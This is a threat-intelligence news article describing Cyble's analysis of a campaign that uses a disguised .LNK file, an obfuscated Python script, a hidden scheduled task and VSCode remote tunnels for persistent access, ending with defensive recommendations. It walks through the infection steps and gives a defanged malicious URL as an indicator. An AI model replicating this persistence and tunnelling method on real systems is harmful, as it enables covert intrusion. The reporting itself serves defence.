Cyble Research and Intelligence Lab (CRIL) researchers have uncovered a sophisticated campaign that starts with a suspicious .LNK file and uses Visual Studio Code (VSCode) to establish persistence and remote access – and installs the VSCode command line interface (CLI) if VSCode isn’t found on the victim machine.
The attack method “mirrors tactics previously observed in campaigns by the Stately Taurus Chinese APT group,” the researchers wrote, noting that they also found Chinese language elements in the campaign.
VSCode Campaign May Start with Social Engineering
The .LNK file that serves as the initial attack vector is “potentially delivered via spam emails,” the Cyble researchers noted. The .LNK file downloads a Python distribution package that is used to execute an obfuscated Python script retrieved from a paste site.
At the time Cyble published the research, the script had no detections on VirusTotal, making it difficult to identify through standard security tools.
The Python script establishes persistence by creating a scheduled task with system privileges and high priority, said the CRIL researchers. It checks to see if VSCode is installed on the victim’s machine, and downloads the standalone VSCode CLI if it’s not found.
The script then creates a remote tunnel using VSCode, sending an activation code to the threat actor that facilitates unauthorized remote access to the machine.
The Cyble researchers illustrated the infection chain in the graphic below:
Attack Starts with a .LNK File, Python Script
The .LNK file masquerades as an installer and displays a fake “Successful installation” message in Chinese. “However, in the background, it silently downloads additional components using the curl utility, including a Python distribution package named ‘python-3.12.5-embed-amd64.zip’,” they wrote.
The .LNK file then creates a directory at %LOCALAPPDATA%MicrosoftPython and extracts the contents of the zip archive using tar.exe. It then downloads a malicious script from a paste.ee site via the URL “hxxps[:]//paste[.]ee/r/DQjrd/0” and saves it as “update.py” in the same location, where it is executed using “pythonw.exe” without showing a console window.
The script checks if VSCode is already installed on the system by looking for the directory at “%LOCALAPPDATA%microsoftVScode.” If the directory isn’t found, the script downloads the VSCode Command Line Interface (CLI) from a Microsoft source: “hxxps://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli[.]zip.” Once downloaded, the file is extracted, and the executable file “code.exe” is placed into the “%LOCALAPPDATA%microsoftVScode” directory.
A scheduled task named “MicrosoftHealthcareMonitorNode” ensures persistence and is designed to execute the “update.py” script using “pythonw.exe,” which runs without showing a console window so the malicious activity can stay hidden. It is scheduled to run every four hours for non-admin users beginning at 8:00 a.m. For admin users, the task is configured to trigger at logon, running with elevated SYSTEM privileges and high priority, “which grants it more control and less likelihood of being interrupted.”
The script then checks to see if “code.exe” is already running in the background by inspecting the output of the “tasklist” command. If not, it executes “code.exe” to log out of any active remote sessions. “This step is crucial for the TA, as it allows them to establish a fresh remote tunnel for future interactions with the victim’s system,” the researchers wrote.
Once communication is established, exfiltration steps can then begin.
Cyble Recommendations
Cyble researchers said the campaign “demonstrates the growing sophistication of TAs in leveraging legitimate tools like VSCode to establish unauthorized access to victim systems. By utilizing a seemingly harmless .LNK file and an obfuscated Python script, the Threat Actor can effectively bypass detection measures.”
Cyble’s recommendations include:
- Advanced endpoint security solutions that use behavioral analysis and machine learning capabilities
- Reviewing scheduled tasks on all systems regularly
- Limiting user software installation permissions
- Deploying advanced monitoring tools that can detect unusual network traffic, unauthorized access attempts, and abnormal behavior
The Cyble blog also covers MITRE ATT&CK techniques, indicators of compromise (IoCs) and more.